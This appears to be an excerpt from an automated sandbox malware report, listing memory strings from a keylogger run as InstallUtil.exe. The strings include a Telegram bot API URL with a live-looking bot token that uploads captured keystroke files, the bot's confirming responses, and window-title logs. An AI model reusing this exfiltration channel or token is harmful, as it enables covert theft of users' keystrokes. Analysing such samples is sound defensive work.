            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":439,"from":{"id":7508829218,"is_bot":true,"first_name":"dacloud","username":"gyyfgsugwubot"},"chat":{"id":1342702073,"first_name":"Johhny","last_name":"X","username":"Johnnyx777","type":"private"},"date":1741159561,"document":{"file_name":"KeyDatalyDLsABf.txt","mime_type":"text/plain","file_id":"BQACAgEAAxkDAAIBt2fH_IlLRcKSr7546Qs43976v5otAAJ9BAACSsJBRsiWYcwhfmeWNgQ","file_unique_id":"AgADfQQAAkrCQUY","file_size":363},"caption":"DC- KeyDatalyDLsABf.txt:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":39,"length":12,"type":"url"}]}}xt/plain","file_id":"BQACAgEAAxkDAAIBqGfH_HPz5pJHrQa8HGEC-jYCzUvRAAJuBAACSsJBRplrzMD4sD7tNgQ","file_unique_id":"AgADbgQAAkrCQUY","file_size":396},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":21,"length":12,"type":"url"}]}}]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750531516.0000000003D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://api.telegram.org/bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.1892:26:18]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:50]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:18]<<Program Manager>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgovwxyzates\user-PC-user\25:30]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ffset":21,"length":12,"type":"url"}]}}d04f5-b1ed-4060-99b9-fca7ff59c113--5]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:59]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 02:28:27]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l"}]}}-5]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:27]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, KeyDatayWFuRDZM.txt.6.drBinary or memory string: [02:25:48]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:16]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BDC-KL:::user-PC\user\8.46.123.189jHBiuDlP7]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:29:00]<<Program Manager
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:15]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:04]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:41]<<Program Manager>>er>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:14]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "}]}}d04f5-b1ed-4060-99b9-fca7ff59c113--:13]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:51]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 16]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--11]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:22]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:06]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :25:48]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3751175605.0000000003942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagertxtmLun/oc
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:58AAK6BAACSsJBRp2TdEHD-ruiNgQ","file_unique_id":"AgADugQAAkrCQUY","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":21,"length":12,"type":"url"}]}}--f5-b1ed-4060-99b9-fca7ff59c113--3]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :28:16]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:35]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, KeyDatayWFuRDZM.txt.6.drBinary or memory string: [02:25:49]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 28:27]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:05]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:52]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://api.telegram.org/bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC- KeyDatalyDLsABf.txt:::user-PC\user\8.46.123.189[02:25:59]<<Program Manager>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:31]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:43]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:29:00]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:58]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3751175605.0000000003942000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:57]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, KeyDataNuoaXkTB.txt.6.drBinary or memory string: [02:25:46]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:19]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:55]<<Program Manager>>e
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:35]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:24]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:13]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:02]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:01]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:12]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2:25:12]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:23]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:54]<<Program Manager:
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\25:59]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :54]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:29]<<Program Manager
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerROxtmLu<L3.S&h
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:27:11]<<Program Manager>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:27:10]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 03]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:25:57]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:42]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:53]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:57]<<Program Manager
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:40]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:25]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :25:25]<<Program Manager
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:03]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:54]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:11]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:33]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:29]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:20]<<Program Manager>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogram Manager
            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:55]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager61712D44/oct
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:34]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:28]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:56]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDication/oct
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:41]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--3]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:59]<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:32]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ffset":21,"length":12,"type":"url"}]}}5:31]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:54]<<Program Manager>E
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BDC-KL:::user-PC\user\8.46.123.189jHBiuDlP6]<<Program Manager>>
            Source: KeyDatayWFuRDZM.txt.6.drBinary or memory string: [02:25:47]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:10]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:55]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750531516.0000000003D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:26:19]<<Program Manager>>
            Source: KeyDatayMRUSbUX.txt.6.drBinary or memory string: [02:25:43]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:04]<<Program Manager>>h:kI
            Source: KeyDataIxTZPxTo.txt.6.drBinary or memory string: [02:25:54]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <C:\Windows\SysWOW64\cdosys.dllfghijklmnopqrstuvwxyzates\user-PC-user\25:11]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":502,"from":{"id":7508829218,"is_bot":true,"first_name":"dacloud","username":"gyyfgsugwubot"},"chat":{"id":1342702073,"first_name":"Johhny","last_name":"X","username":"Johnnyx777","type":"private"},"date":1741159740,"document":{"file_name":"KeyDataQcOnaJJH.txt","mime_type":"text/plain","file_id":"BQACAgEAAxkDAAIB9mfH_TyLaDFxAnrFUtKLuoJvDutJAAK8BAACSsJBRmETwPCVsF1aNgQ","file_unique_id":"AgADvAQAAkrCQUY","file_size":396},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":21,"length":12,"type":"url"}]}}d04f5-b1ed-4060-99b9-fca7ff59c113--:13]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:28]<<Program Managera}function Fa(a){return a.s===M?a.toJSON():Aa(a)};function Ga(a,b,c){c=void 0===c?K:c;if(null!=a){if(ta&&a instanceof Uint8Array)return b?a:new Uint8Array(a);if(Array.isArray(a)){var d=H(a);if(d&2)return a;if(b&&!(d&64)&&(d&32||0===d))return I(a,d|34),a;a=Ea(a,Ga,d&4?K:c,!0,!1,!0);b=H(a);b&4&&b&2&&Object.freeze(a);return a}a.s===M&&(b=a.h,c=J(b),a=c&2?a:Q(a.constructor,Ha(b,c,!0)));return a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.length-1][c]}else{var e=a.length;if(d&&b&256&&(d=a[e-1][c],null!=d))return d;b=c+((b>>9&1)-1);if(b<e)return a[b]}}function Ka(a,b,c,d,e){var f=L(b);if(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)}
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:29:00]753C4C332E53794D3F3B2336264A68]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:29:00]<<Program Manager>>s/
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000134D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerROxtmLu<L3.S<
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:49]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:38]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:48]<<Program Manager>$
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:26]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:37]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:09]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :02]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:36]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:48]<<Program Manager>>
